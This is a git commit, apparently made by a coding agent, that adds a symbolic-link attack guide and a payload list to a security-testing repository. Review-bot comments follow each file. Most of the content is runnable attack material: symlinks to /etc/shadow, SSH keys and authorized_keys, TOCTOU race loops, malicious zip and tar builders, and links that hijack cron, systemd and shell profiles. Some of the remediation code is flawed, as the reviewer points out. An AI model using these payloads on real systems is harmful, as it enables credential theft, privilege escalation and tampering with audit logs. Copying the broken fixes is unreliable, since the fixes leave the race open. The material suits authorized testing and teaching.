Add timing attacks, Tor-based attacks, SSJI, symbolic link attacks, and enhanced auth bypass payloads

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 15:54:35 +00:00
parent 5c4486169d
commit 1677a567e7
10 changed files with 4302 additions and 0 deletions
+628
@@ -0,0 +1,628 @@
# Symbolic Link Attacks (Symlink Attacks)
## Description
Symbolic link attacks, also known as symlink attacks, exploit the behavior of symbolic links (symlinks) in file systems. A symbolic link is a file that points to another file or directory. Attackers can manipulate symlinks to trick applications into accessing, modifying, or deleting files they shouldn't have access to, leading to privilege escalation, information disclosure, or denial of service.
## How Symbolic Link Attacks Work
When an application follows a symbolic link without proper validation:
1. Attacker creates a symlink pointing to a sensitive file
2. Application attempts to write/read to the symlink path
3. Operation is performed on the target file instead
4. Results in unauthorized file access, modification, or deletion
## Common Vulnerabilities
### 1. **Time-of-Check-Time-of-Use (TOCTOU)**
Application checks file permissions, attacker replaces file with symlink before use.
### 2. **Insecure Temporary File Handling**
Applications create predictable temp files that can be symlinked.
### 3. **Log File Symlink**
Replacing log files with symlinks to sensitive files.
### 4. **Archive Extraction**
Extracting archives containing malicious symlinks.
### 5. **File Upload Symlink**
Uploading symlinks via file upload functionality.
### 6. **Configuration File Symlink**
Symlinking configuration files to gain access or privileges.
### 7. **Backup/Restore Symlink**
Exploiting backup processes that follow symlinks.
## Common Attack Vectors
- Temporary file operations
- Log file handling
- File upload functionality
- Archive extraction (tar, zip)
- Backup/restore operations
- Cache directories
- Configuration file access
- Web server document roots
## Testing Methodology & PoC Examples
### PoC 1: Basic Symlink Attack on Temp Files
**Vulnerability:** Application creates predictable temp files.
**Steps to Test:**
1. Identify temp file creation pattern
2. Create symlink before application creates file
3. Application writes to symlink, modifying target file
**Attack:**
```bash
# Attacker predicts temp file location
# Application will create /tmp/app_12345.tmp
# Attacker creates symlink first
ln -s /etc/passwd /tmp/app_12345.tmp
# When application writes to /tmp/app_12345.tmp,
# it actually writes to /etc/passwd
```
**Python Example:**
```python
import os
import time
# Predict temporary file name
temp_file = f"/tmp/app_{os.getpid()}.tmp"
# Create symlink to target
os.symlink("/etc/shadow", temp_file)
# Wait for application to write to temp file
# Application unknowingly writes to /etc/shadow
```
---
### PoC 2: TOCTOU Race Condition with Symlinks
**Vulnerability:** Time gap between checking and using a file.
**Steps to Test:**
1. Application checks if file is safe
2. Attacker quickly replaces file with symlink
3. Application uses the symlink
**Bash Script:**
```bash
#!/bin/bash
# Exploit TOCTOU vulnerability
TARGET="/path/to/sensitive/file"
EXPLOITED="/path/to/app/data/file.txt"
while true; do
# Remove existing file
rm -f "$EXPLOITED" 2>/dev/null
# Create normal file (passes checks)
touch "$EXPLOITED"
# Quickly replace with symlink
rm -f "$EXPLOITED"
ln -s "$TARGET" "$EXPLOITED"
done
```
**C Example:**
```c
// Vulnerable code
if (access(filename, W_OK) == 0) {
// RACE CONDITION WINDOW
// Attacker can replace file with symlink here
FILE *fp = fopen(filename, "w");
fprintf(fp, "sensitive data");
fclose(fp);
}
```
---
### PoC 3: Log File Symlink Attack
**Vulnerability:** Application writes to log files without checking for symlinks.
**Steps to Test:**
1. Identify log file location
2. Replace log file with symlink to target
3. Application logs trigger write to target file
**Attack:**
```bash
# Application writes to /var/log/app.log
# Attacker replaces log file
rm /var/log/app.log
ln -s /etc/passwd /var/log/app.log
# Application's log writes now corrupt /etc/passwd
```
**Request to trigger logging:**
```http
POST /api/endpoint HTTP/1.1
Host: example.com
Content-Type: application/json
```
**Result:** Log entry written to /etc/passwd instead of log file.
---
### PoC 4: Archive Extraction Symlink Attack (Zip Slip)
**Vulnerability:** Extracting archives containing malicious symlinks.
**Steps to Test:**
1. Create archive with symlinks pointing outside extraction directory
2. Upload or provide archive to application
3. Extraction follows symlinks, writing to unintended locations
**Creating Malicious Archive:**
```bash
# Create malicious tar archive
mkdir evil
cd evil
ln -s /etc/passwd symlink.txt
echo "evil content" > data.txt
cd ..
tar -czf evil.tar.gz evil/
# Or with absolute path symlink
ln -s /etc/passwd /tmp/evil_symlink
tar -czf evil.tar.gz /tmp/evil_symlink
# Zip with symlink
ln -s ../../../etc/passwd symlink
zip --symlinks evil.zip symlink
```
**Python Script to Create Malicious Zip:**
```python
import zipfile
import os
# Create zip with malicious symlink
with zipfile.ZipFile('evil.zip', 'w') as zf:
# Create symlink entry
info = zipfile.ZipInfo('link')
info.create_system = 3 # Unix
info.external_attr = 0o120777 << 16 # Symlink
zf.writestr(info, '../../../etc/passwd')
```
---
### PoC 5: File Upload Symlink Bypass
**Vulnerability:** File upload allows symlink creation.
**Steps to Test:**
1. Create symlink on local system
2. Upload symlink file
3. Access uploaded symlink to read target file
**Creating Symlink for Upload:**
```bash
# Create symlink to sensitive file
ln -s /etc/passwd passwd_link.txt
# Upload passwd_link.txt via web form
# If server preserves symlink and allows access:
curl https://example.com/uploads/passwd_link.txt
# Returns contents of /etc/passwd
```
**Multipart Form Data:**
```http
POST /upload HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----boundary
------boundary
Content-Disposition: form-data; name="file"; filename="link.txt"
Content-Type: application/octet-stream
<symlink binary data>
------boundary--
```
---
### PoC 6: Configuration File Symlink
**Vulnerability:** Application reads configuration from predictable location.
**Steps to Test:**
1. Identify config file location
2. Create symlink from config location to attacker-controlled file
3. Application reads attacker's configuration
**Attack:**
```bash
# Application reads /etc/app/config.ini
# Attacker creates symlink
rm /etc/app/config.ini
ln -s /tmp/attacker_config.ini /etc/app/config.ini
# Attacker's config file
cat > /tmp/attacker_config.ini << EOF
[auth]
admin_password=hacked
debug_mode=true
EOF
```
---
### PoC 7: Web Document Root Symlink
**Vulnerability:** Web server follows symlinks in document root.
**Steps to Test:**
1. Upload or create symlink in web root
2. Access symlink via browser
3. Read arbitrary files from server
**Attack:**
```bash
# Create symlink in web directory
cd /var/www/html/uploads/
ln -s /etc/passwd passwd.txt
ln -s /home/user/.ssh/id_rsa key.txt
# Access via browser
curl https://example.com/uploads/passwd.txt
# Returns /etc/passwd contents
```
**Apache Configuration Exploitation:**
```apache
# If Options FollowSymLinks is enabled
<Directory /var/www/html>
Options FollowSymLinks # Vulnerable!
</Directory>
```
---
### PoC 8: Backup Symlink Attack
**Vulnerability:** Backup process follows symlinks.
**Steps to Test:**
1. Identify backup process and source directory
2. Create symlinks in backup source pointing to sensitive files
3. Backup includes sensitive files
**Attack:**
```bash
# Application backs up /home/user/data/
# Attacker creates symlinks in data directory
cd /home/user/data/
ln -s /etc/shadow shadow_backup
ln -s /root/.ssh/id_rsa root_key
# Backup process follows symlinks and includes sensitive files
# Attacker extracts sensitive files from backup archive
```
---
### PoC 9: Cache Directory Symlink
**Vulnerability:** Application caches data in directory with weak permissions.
**Steps to Test:**
1. Identify cache directory
2. Replace cache file with symlink
3. Application writes cached data to target file
**Attack:**
```bash
# Application caches to /tmp/app_cache/user_123
# Attacker creates symlink
rm -rf /tmp/app_cache/user_123
ln -s /home/victim/.ssh/authorized_keys /tmp/app_cache/user_123
# Application writes cache data (containing attacker's SSH key)
# to victim's authorized_keys file
```
---
### PoC 10: Symlink Directory Traversal
**Vulnerability:** Application accepts file paths without proper validation.
**Steps to Test:**
1. Create symlink chain for directory traversal
2. Use symlinks to access files outside intended directory
**Attack:**
```bash
# Create symlink chain
mkdir -p /tmp/uploads/a/b/c
cd /tmp/uploads
ln -s / a/b/c/root
# Request file via application
GET /api/download?file=a/b/c/root/etc/passwd
# Application follows symlink to /etc/passwd
```
---
## Exploitation Techniques
### 1. **Privilege Escalation**
```bash
# Replace /etc/passwd with symlink to attacker-controlled file
# When application writes to "passwd", it writes to attacker's file
ln -s /tmp/attacker_passwd /etc/passwd
```
### 2. **SSH Key Injection**
```bash
# Symlink authorized_keys
ln -s /tmp/attacker_keys /home/victim/.ssh/authorized_keys
# Application writes attacker's key to authorized_keys
```
### 3. **Configuration Override**
```bash
# Symlink config file
ln -s /tmp/evil_config /etc/app/app.conf
```
### 4. **Arbitrary File Read**
```bash
# Symlink in web root
ln -s /etc/passwd /var/www/html/exposed.txt
```
### 5. **Arbitrary File Write**
```bash
# Symlink temp file to target
ln -s /etc/crontab /tmp/app_temp_file
```
### 6. **Denial of Service**
```bash
# Symlink to /dev/zero or /dev/random
ln -s /dev/zero /var/log/app.log
# Application hangs trying to read infinite data
```
## Detection and Testing Tools
### 1. **Manual Testing**
```bash
# Check if symlinks are followed
ln -s /etc/passwd test_link.txt
# Upload and access test_link.txt
# Check temp file creation
strace -e openat,open application 2>&1 | grep tmp
```
### 2. **Automated Testing Script**
```python
import os
import time
import requests
def test_symlink_vulnerability(upload_url, access_url):
# Create symlink to /etc/passwd
symlink_name = "test_symlink.txt"
os.symlink("/etc/passwd", symlink_name)
# Upload symlink
with open(symlink_name, 'rb') as f:
files = {'file': f}
response = requests.post(upload_url, files=files)
# Try to access symlink
response = requests.get(f"{access_url}/{symlink_name}")
if "root:" in response.text:
print("[!] Symlink vulnerability confirmed!")
print(response.text)
else:
print("[+] No vulnerability detected")
# Cleanup
os.remove(symlink_name)
```
### 3. **Archive Testing**
```bash
# Create test archive with symlink
ln -s /etc/passwd testlink
tar -czf test.tar.gz testlink
# Upload and extract
# Check if extraction follows symlink
```
### 4. **TOCTOU Race Condition Testing**
```bash
# Run in parallel
while true; do
rm -f target_file
touch target_file
rm -f target_file
ln -s /etc/passwd target_file
done &
# Meanwhile, trigger application to use target_file
```
## Exploitation Impact
- **Critical:** Arbitrary file read/write, privilege escalation
- **High:** SSH key injection, configuration manipulation
- **Medium:** Information disclosure, DoS
- **Data Breach:** Access to sensitive files (passwords, keys, configs)
## Remediation
### 1. **Never Follow Symlinks**
```python
# Bad - Follows symlinks
with open(filename, 'r') as f:
data = f.read()
# Good - Check for symlink first
import os
if os.path.islink(filename):
raise Exception("Symlinks not allowed")
with open(filename, 'r') as f:
data = f.read()
```
### 2. **Use O_NOFOLLOW Flag**
```c
// Open file without following symlinks
int fd = open(filename, O_RDONLY | O_NOFOLLOW);
if (fd == -1 && errno == ELOOP) {
// File is a symlink
printf("Symlink detected, access denied\n");
}
```
### 3. **Validate File Paths**
```python
import os
import pathlib
def is_safe_path(basedir, path):
# Resolve both paths
base = pathlib.Path(basedir).resolve()
target = pathlib.Path(path).resolve()
# Check if target is within basedir
try:
target.relative_to(base)
return True
except ValueError:
return False
```
### 4. **Use Secure Temporary Files**
```python
import tempfile
# Secure temp file creation
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(b"data")
temp_filename = f.name
```
### 5. **Disable Symlinks in Web Server**
```apache
# Apache
<Directory /var/www/html>
Options -FollowSymLinks
</Directory>
# Nginx
disable_symlinks on;
```
### 6. **Check File Type Before Operations**
```bash
# Check if file is a regular file
if [ -f "$file" ] && [ ! -L "$file" ]; then
cat "$file"
else
echo "Not a regular file or is a symlink"
fi
```
### 7. **Use chroot or Containers**
- Isolate application in restricted environment
- Limit file system access
### 8. **Atomic Operations**
```c
// Use O_EXCL to fail if file exists
int fd = open(filename, O_CREAT | O_EXCL | O_WRONLY, 0600);
if (fd == -1) {
perror("File already exists");
exit(1);
}
```
### 9. **File Permission Checks**
```python
import os
import stat
def is_safe_file(path):
try:
st = os.lstat(path) # lstat doesn't follow symlinks
# Check if it's a symlink
if stat.S_ISLNK(st.st_mode):
return False
# Check if it's a regular file
if not stat.S_ISREG(st.st_mode):
return False
return True
except OSError:
return False
```
### 10. **Input Validation for Archives**
```python
import tarfile
import os
def safe_extract(tar_path, extract_path):
with tarfile.open(tar_path, 'r') as tar:
for member in tar.getmembers():
# Check for absolute paths
if member.name.startswith('/'):
raise Exception("Absolute path in archive")
# Check for path traversal
if '..' in member.name:
raise Exception("Path traversal in archive")
# Check if symlink
if member.issym() or member.islnk():
raise Exception("Symlinks not allowed in archive")
# Safe extraction
tar.extract(member, extract_path)
```
## References
- [CWE-59: Improper Link Resolution Before File Access](https://cwe.mitre.org/data/definitions/59.html)
- [CWE-61: UNIX Symbolic Link Following](https://cwe.mitre.org/data/definitions/61.html)
- [CWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition](https://cwe.mitre.org/data/definitions/367.html)
- [OWASP - Path Traversal](https://owasp.org/www-community/attacks/Path_Traversal)
- [Zip Slip Vulnerability](https://snyk.io/research/zip-slip-vulnerability)
## Payloads
See `symbolic-link-payloads.txt` for a comprehensive list of symlink attack payloads and techniques.
See `symbolic-link-payloads.txt` for a comprehensive list of symlink attack payloads and techniques.
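Review bot: the recommended fix under "1. Never Follow Symlinks" (`if os.path.islink(filename): raise ...` followed by a separate `open(filename, 'r')`) is itself the check-then-use race that PoC 2 and remediation 2 warn about; an attacker who can swap the path between the `islink` call and the `open` defeats it. Open first and validate the descriptor instead: `fd = os.open(filename, os.O_RDONLY | os.O_NOFOLLOW)`, then `os.fstat(fd)` for the `S_ISREG` check, and only pair the `lstat`-based `is_safe_file` from remediation 9 with an `O_NOFOLLOW` open. Two more defects in the remediation code: `is_safe_path` resolves `path` against the process working directory rather than against `basedir`, so a relative name such as `uploads/x` is judged against the wrong root; use `(base / path).resolve()`. In `safe_extract`, `if '..' in member.name` rejects legitimate names like `notes..txt` and still misses traversal that only appears after normalisation; check containment with `os.path.realpath` against the extraction directory, or on Python 3.12+ use `tar.extractall(path, filter='data')`, which refuses absolute names, traversal and link members. On the descriptive side, the page never states the precondition that makes any of these PoCs meaningful: the tester must be able to create the link in a directory they control while a process with more privilege later performs the file operation. Without that, entries such as "Privilege Escalation" (`ln -s /tmp/attacker_passwd /etc/passwd`) and the `rm /var/log/app.log` step in PoC 3 describe actions that already require root and so escalate nothing; stating the precondition at the top of "How Symbolic Link Attacks Work" would also make the impact ratings defensible. Smaller points: "Zip Slip" refers to `../` traversal in archive entry names, a different bug from archive symlinks, so PoC 4's title conflates the two; the `/dev/zero` DoS example only applies when the application reads the path, since writes to `/dev/zero` succeed and are discarded; and the closing "See `symbolic-link-payloads.txt` ..." line is duplicated.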
@@ -0,0 +1,436 @@
# Symbolic Link Attack Payloads
# ============================================
# 1. BASIC SYMLINK CREATION
# ============================================
# Create symlink to sensitive files
ln -s /etc/passwd passwd_link.txt
ln -s /etc/shadow shadow_link.txt
ln -s /etc/hosts hosts_link.txt
ln -s /root/.ssh/id_rsa root_key_link
ln -s /home/user/.ssh/authorized_keys auth_keys_link
# Symlink to directories
ln -s /etc/ etc_link
ln -s /root/ root_link
ln -s / rootfs_link
ln -s /var/log/ logs_link
# ============================================
# 2. TEMPORARY FILE SYMLINK ATTACKS
# ============================================
# Predict and create temp file symlinks
ln -s /etc/passwd /tmp/app_12345.tmp
ln -s /etc/shadow /tmp/temp_file_$$.tmp
ln -s /root/.ssh/id_rsa /tmp/upload_temp.txt
ln -s /etc/crontab /var/tmp/app_session
# Common temp file patterns
ln -s /etc/passwd /tmp/php_upload_12345
ln -s /etc/passwd /tmp/mysql.sock
ln -s /etc/passwd /var/tmp/sess_abcd1234
# ============================================
# 3. LOG FILE SYMLINK ATTACKS
# ============================================
# Replace log files with symlinks
ln -s /etc/passwd /var/log/app.log
ln -s /etc/shadow /var/log/error.log
ln -s /home/user/.ssh/authorized_keys /var/log/access.log
ln -s /etc/crontab /var/log/system.log
# Symlink to /dev/null for DoS
ln -s /dev/null /var/log/app.log
# Symlink to /dev/zero for infinite data
ln -s /dev/zero /var/log/app.log
# ============================================
# 4. WEB ROOT SYMLINK ATTACKS
# ============================================
# Create symlinks in web directories
ln -s /etc/passwd /var/www/html/passwd.txt
ln -s /etc/shadow /var/www/html/shadow.txt
ln -s /root/.ssh/id_rsa /var/www/html/key.txt
ln -s /home/user/.bash_history /var/www/html/history.txt
ln -s /var/log/apache2/access.log /var/www/html/access.txt
# Symlink to entire directories
ln -s /etc/ /var/www/html/etc
ln -s /root/ /var/www/html/root
ln -s /home/ /var/www/html/home
# PHP uploads directory
ln -s /etc/passwd /var/www/html/uploads/passwd.txt
ln -s /etc/passwd /var/www/html/files/config.txt
# ============================================
# 5. CONFIGURATION FILE SYMLINK
# ============================================
# Replace config files
ln -s /tmp/attacker_config /etc/app/app.conf
ln -s /tmp/evil.ini /etc/app/database.ini
ln -s /tmp/settings.xml /etc/app/settings.xml
# MySQL config
ln -s /tmp/evil.cnf /etc/mysql/my.cnf
# Apache config
ln -s /tmp/evil.conf /etc/apache2/sites-enabled/000-default.conf
# ============================================
# 6. SSH KEY INJECTION SYMLINKS
# ============================================
# Symlink authorized_keys
ln -s /tmp/attacker_keys /home/victim/.ssh/authorized_keys
ln -s /tmp/attacker_keys /root/.ssh/authorized_keys
# Symlink SSH config
ln -s /tmp/evil_ssh_config /home/user/.ssh/config
# Symlink known_hosts
ln -s /dev/null /home/user/.ssh/known_hosts
# ============================================
# 7. ARCHIVE EXTRACTION SYMLINKS (ZIP SLIP)
# ============================================
# Bash commands to create malicious archives
# Tar archive with symlink to /etc/passwd
ln -s /etc/passwd evil_link.txt
tar -czf evil.tar.gz evil_link.txt
# Tar with absolute path symlink
ln -s /etc/shadow /tmp/shadow_link
tar -czf evil.tar.gz /tmp/shadow_link
# Tar with directory traversal symlink
mkdir -p a/b/c
ln -s ../../../etc/passwd a/b/c/passwd
tar -czf evil.tar.gz a/
# Zip with symlink
ln -s /etc/passwd passwd_link
zip --symlinks evil.zip passwd_link
# Zip with path traversal
ln -s ../../../../../../etc/passwd link
zip --symlinks evil.zip link
# ============================================
# 8. BACKUP SYMLINK ATTACKS
# ============================================
# Place symlinks in backup source directory
cd /home/user/backup_source/
ln -s /etc/shadow shadow_backup.txt
ln -s /root/.ssh/id_rsa root_key.txt
ln -s /var/log/auth.log auth_log.txt
ln -s /etc/mysql/debian.cnf mysql_creds.txt
# Symlink entire sensitive directories
ln -s /root/.ssh/ ssh_dir_backup
ln -s /etc/ etc_backup
# ============================================
# 9. CACHE DIRECTORY SYMLINKS
# ============================================
# Replace cache files with symlinks
ln -s /etc/passwd /tmp/app_cache/user_data
ln -s /home/victim/.ssh/authorized_keys /var/cache/app/session_123
ln -s /etc/crontab /var/tmp/cache/data_456
# ============================================
# 10. FILE UPLOAD SYMLINK EXPLOITATION
# ============================================
# Create symlinks for upload testing
ln -s /etc/passwd upload_passwd.txt
ln -s /etc/shadow upload_shadow.txt
ln -s /root/.ssh/id_rsa upload_key.pem
ln -s /proc/self/environ upload_env.txt
# Symlink with allowed extension
ln -s /etc/passwd document.pdf
ln -s /etc/passwd image.jpg
ln -s /etc/passwd file.txt
# ============================================
# 11. TOCTOU RACE CONDITION PAYLOADS
# ============================================
# Continuous race condition exploit
while true; do
rm -f /tmp/target_file 2>/dev/null
touch /tmp/target_file
rm -f /tmp/target_file
ln -s /etc/passwd /tmp/target_file
sleep 0.001
done
# Python TOCTOU exploit
# import os, time
# while True:
# try:
# os.remove('/tmp/target')
# open('/tmp/target', 'w').close()
# os.remove('/tmp/target')
# os.symlink('/etc/passwd', '/tmp/target')
# except: pass
# ============================================
# 12. SYMLINK DIRECTORY TRAVERSAL
# ============================================
# Create symlink chains for traversal
mkdir -p /tmp/uploads/a/b/c/d/e
cd /tmp/uploads
ln -s / a/b/c/d/e/root
# Multiple level traversal
ln -s ../../../../../../../etc/passwd link1.txt
ln -s ../../../../../../etc/shadow link2.txt
# Relative path symlinks
cd /var/www/html/uploads
ln -s ../../../etc/passwd passwd.txt
# ============================================
# 13. CRON JOB SYMLINK ATTACKS
# ============================================
# Symlink crontab
ln -s /tmp/evil_cron /var/spool/cron/crontabs/root
ln -s /tmp/attacker_cron /etc/cron.d/custom
# Symlink cron scripts
ln -s /tmp/evil_script.sh /etc/cron.daily/backup
# ============================================
# 14. DATABASE SYMLINK ATTACKS
# ============================================
# MySQL data directory symlinks
ln -s /etc/passwd /var/lib/mysql/database/table.MYD
# PostgreSQL symlinks
ln -s /etc/shadow /var/lib/postgresql/data/pg_hba.conf
# SQLite database symlinks
ln -s /etc/passwd /var/www/app/database.sqlite
# ============================================
# 15. SESSION FILE SYMLINKS
# ============================================
# PHP session symlinks
ln -s /etc/passwd /var/lib/php/sessions/sess_abc123
ln -s /tmp/attacker_session /var/lib/php/sessions/sess_victim
# Application session symlinks
ln -s /etc/shadow /tmp/sessions/user_session_123
# ============================================
# 16. PACKAGE/DEPENDENCY SYMLINKS
# ============================================
# NPM/Node modules
ln -s /tmp/evil_module /var/www/app/node_modules/package
# Python site-packages
ln -s /tmp/evil_module.py /usr/lib/python3/site-packages/module.py
# ============================================
# 17. SYSTEMD/INIT SYMLINKS
# ============================================
# Systemd service symlinks
ln -s /tmp/evil.service /etc/systemd/system/app.service
# Init script symlinks
ln -s /tmp/evil_script /etc/init.d/custom_service
# ============================================
# 18. MAIL SPOOL SYMLINKS
# ============================================
# Mail spool symlinks
ln -s /etc/shadow /var/mail/root
ln -s /root/.ssh/id_rsa /var/spool/mail/user
# ============================================
# 19. PRINTER/DEVICE SYMLINKS
# ============================================
# Symlink to devices
ln -s /dev/random /tmp/data_file
ln -s /dev/zero /var/log/app.log
ln -s /dev/null /tmp/output.txt
# Printer spool
ln -s /etc/passwd /var/spool/cups/tmp/job_123
# ============================================
# 20. DOCKER/CONTAINER SYMLINKS
# ============================================
# Docker volume symlinks
ln -s /etc/passwd /var/lib/docker/volumes/app/_data/config.txt
# Container mount symlinks
ln -s /host/etc/passwd /container/app/data/passwd.txt
# ============================================
# 21. GIT REPOSITORY SYMLINKS
# ============================================
# Git hooks symlinks
ln -s /tmp/evil_hook.sh /var/www/app/.git/hooks/pre-commit
# Git config symlinks
ln -s /tmp/evil_config /var/www/app/.git/config
# ============================================
# 22. COMPILER/BUILD SYMLINKS
# ============================================
# Include file symlinks
ln -s /etc/passwd /usr/include/config.h
# Library symlinks
ln -s /tmp/evil.so /usr/lib/libapp.so
# ============================================
# 23. BROWSER CACHE SYMLINKS
# ============================================
# Browser profile symlinks
ln -s /etc/passwd ~/.mozilla/firefox/profile/prefs.js
ln -s /etc/shadow ~/.config/google-chrome/Default/Preferences
# ============================================
# 24. SETUID/SETGID SYMLINKS
# ============================================
# Symlinks to setuid binaries (for analysis)
ln -s /usr/bin/sudo /tmp/sudo_link
ln -s /usr/bin/passwd /tmp/passwd_link
# ============================================
# 25. PROCFS SYMLINKS
# ============================================
# Process information symlinks
ln -s /proc/self/environ /var/www/html/env.txt
ln -s /proc/self/cmdline /tmp/cmdline.txt
ln -s /proc/self/cwd /tmp/cwd_link
ln -s /proc/self/fd/0 /tmp/stdin_link
# ============================================
# 26. NETWORK CONFIGURATION SYMLINKS
# ============================================
# Network config symlinks
ln -s /tmp/evil_hosts /etc/hosts
ln -s /tmp/evil_resolv /etc/resolv.conf
ln -s /tmp/evil_network /etc/network/interfaces
# ============================================
# 27. USER PROFILE SYMLINKS
# ============================================
# Shell profile symlinks
ln -s /tmp/evil_bashrc /home/user/.bashrc
ln -s /tmp/evil_profile /home/user/.profile
ln -s /tmp/evil_zshrc /home/user/.zshrc
# ============================================
# 28. MONITORING/AUDIT SYMLINKS
# ============================================
# Audit log symlinks
ln -s /dev/null /var/log/audit/audit.log
# Monitoring config symlinks
ln -s /tmp/evil_config /etc/nagios/nrpe.cfg
# ============================================
# 29. CLOUD METADATA SYMLINKS
# ============================================
# AWS metadata symlinks (if accessible)
ln -s /proc/self/environ /var/www/html/aws_metadata.txt
# ============================================
# 30. RECURSIVE SYMLINK (DoS)
# ============================================
# Create circular symlinks for DoS
ln -s /tmp/link1 /tmp/link2
ln -s /tmp/link2 /tmp/link1
# Self-referential symlink
ln -s /tmp/selflink /tmp/selflink
# ============================================
# TESTING COMMANDS
# ============================================
# Check if file is a symlink
test -L /path/to/file && echo "Is a symlink"
# List symlinks
find /path -type l
# Show symlink target
readlink /path/to/symlink
ls -l /path/to/symlink
# Create symlink with specific name
ln -s /target /symlink_name
# Force create symlink (overwrite existing)
ln -sf /target /symlink_name
# Create relative symlink
ln -sr /target /symlink_name
# ============================================
# PREVENTION TESTING
# ============================================
# Test if application follows symlinks
ln -s /etc/passwd /tmp/test_symlink.txt
# Upload/access /tmp/test_symlink.txt
# If contents of /etc/passwd are returned, vulnerable
# Test O_NOFOLLOW behavior
# Create symlink and try to open it
# Should fail with ELOOP error if protected
# Test path validation
ln -s /etc/passwd allowed_dir/../../etc/passwd_link
# Try to access via application
# ============================================
# WINDOWS EQUIVALENTS (JUNCTION/MKLINK)
# ============================================
# Windows symbolic links (requires admin)
# mklink /D link target_directory
# mklink file_link target_file
# Windows junctions (no admin required)
# mklink /J junction_dir target_directory
# Example payloads (Windows)
# mklink passwd.txt C:\Windows\System32\config\SAM
# mklink /D sensitive_dir C:\Users\Administrator
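Review bot: a large share of these entries target paths that only root can replace (`ln -s /tmp/evil_hosts /etc/hosts`, `ln -s /tmp/evil_cron /var/spool/cron/crontabs/root`, and most of sections 13, 16, 17, 22, 26 and 28), so they are not payloads for a symlink attack: anyone able to run them has already crossed the privilege boundary the attack is meant to cross. Add a header stating the precondition for every entry (the tester can create the link in a directory they can write to, and a more privileged process later opens that path) and move the root-only entries to a separate list of impact targets. A testing caveat belongs in the same header: Linux with `fs.protected_symlinks=1`, the default on current mainstream distributions, refuses to follow a symlink in a world-writable sticky directory such as `/tmp` unless the follower owns the link or the link owner also owns the directory, so the `/tmp` and `/var/tmp` payloads in sections 2, 9, 11 and 19 fail on hardened hosts and a negative result there is not evidence that the application is safe. Two entries misstate the effect: the circular links in section 30 make `open()` fail with ELOOP immediately rather than hang, and the `/dev/zero` link in section 3 only yields "infinite data" if the application reads the path, since writes to it are discarded. Section 24 needs documentation or removal: a symlink to a setuid binary has no effect on the setuid bit, which lives on the target inode. Style: `ln -s /dev/zero /var/log/app.log` appears in both sections 3 and 19, and the `authorized_keys` entries in section 6 duplicate the SSH Key Injection block in the markdown page; the Python TOCTOU loop in section 11 is shipped commented out, so either say it is illustrative or give it its own file; `ln -sr` is GNU-only (`--relative`) and should be marked as such; and "Windows symbolic links (requires admin)" is a simplification, since the actual requirement is SeCreateSymbolicLinkPrivilege, which Developer Mode grants to unprivileged users on Windows 10 and later.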